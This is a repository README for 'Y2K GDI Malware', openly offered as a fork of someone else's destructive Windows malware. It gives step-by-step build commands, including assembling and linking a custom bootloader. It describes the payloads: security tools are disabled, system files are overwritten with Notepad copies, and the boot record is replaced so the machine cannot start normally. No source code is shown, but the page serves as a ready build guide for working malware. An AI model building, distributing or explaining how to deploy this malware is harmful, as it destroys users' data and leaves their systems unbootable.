Vega 88eb01df8f | ||
---|---|---|
mbr | ||
res | ||
src | ||
.gitignore | ||
LICENSE | ||
Makefile | ||
README.org |
README.org
Y2K GDI Malware
A fork of a malware created by Jotaxisz with a reworked source structure (minor changes).
To run this malware you need a Windows XP macchine with date set to <2000-01-01 Sat> or <2000-01-02 Sun> wich will change the payload.
Building
On Linux
You will need MinGW and Make. You can parse the
argument CXX
to change the C++ compiler (the default is i686-w64-mingw-g++
) and
the WINDRES
to change the default windres
command (the default is i686-w64-mingw-windres
).
Others arguments are NASM
and LD
for changing the nasm and ld commands.
You can change the CXX
and WINDRES
and LD
to x86_64-w64-mingw-g++
and x86_64-w64-mingw-windres
and x86_64-w64-mingw32-ld
respectively to build it natively for 64bit envioriments.
Arch linux:
pacman -S make mingw-w64 nasm
make
Ubuntu
apt install make mingw-w64 nasm
make
You can also execute make clean
to clean bin/
folder, .o
files on res/
and .bin
and .o
files on folder mbr/
.
On Windows
You will need to install MinGW or another C++ compiler and NASM. Then run the command:
windres -o res\resource.o res\resource.rc
nasm -o mbr\bootloader.bin mbr\bootloader.asm
ld -r -b binary -o mbr\bootloader.o mbr\bootloader.bin
g++ src\* res\resource.o mbr\bootloader.o -static -l gdi32 -l winmm -o Y2K
Bootloader
This project has a void function under the namespace called byeByeBoot, this function load and write the custom bootloader code to the EFI partition. The source code the binary can be found here.
Payloads
If you execute the malware at any date it will always disable the Task Manager, CMD, Execute and Power Options.
<2000-01-01 Sat>
This payload will start the res/alarm.wav
and then start the GDI part and replace multiples system files with copies of Notepad executables, after the visual payload ended after forcing reseting the machine the bootloader payload will start.
<2000-01-02 Sun>
This payload will start the res/jeff_syndicate_hip_hop.wav
.